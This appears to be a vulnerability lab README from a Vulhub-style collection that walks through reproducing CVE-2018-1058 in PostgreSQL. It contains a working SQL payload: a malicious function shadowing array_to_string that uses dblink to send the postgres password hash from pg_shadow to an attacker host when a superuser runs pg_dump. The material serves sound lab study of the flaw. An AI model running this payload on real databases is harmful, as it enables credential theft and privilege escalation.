PostgreSQL Privilege Escalation (CVE-2018-1058)¶

中文文档

PostgreSQL is a powerful open-source relational database system. A logical error exists in versions 9.3 through 10, where superusers can unknowingly execute malicious code created by regular users, leading to unexpected operations.

References:

• https://wiki.postgresql.org/wiki/A_Guide_to_CVE-2018-1058:_Protect_Your_Search_Path
• https://xianzhi.aliyun.com/forum/topic/2109

Environment Setup¶

Execute the following command to start a vulnerable PostgreSQL server:

docker compose up -d

The server will start and listen on the default PostgreSQL port 5432.

Vulnerability Reproduction¶

Following the second exploitation method from the references, we'll first connect to PostgreSQL as the regular user vulhub:vulhub:

psql --host your-ip --username vulhub

Execute the following SQL statements and then exit:

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

Now, set up a listener on port 5433 at 10.0.0.1 to wait for the superuser to trigger our "backdoor".

(Simulating superuser actions) On the target machine, execute the pg_dump command as the superuser:

docker compose exec postgres pg_dump -U postgres -f evil.bak vulhub

This command will export the contents of the vulhub database. When executed, our "backdoor" is triggered, and sensitive information is received on the 10.0.0.1 machine:

This is just one of several exploitation methods for this vulnerability. For more exploitation techniques, please refer to the articles in the References section.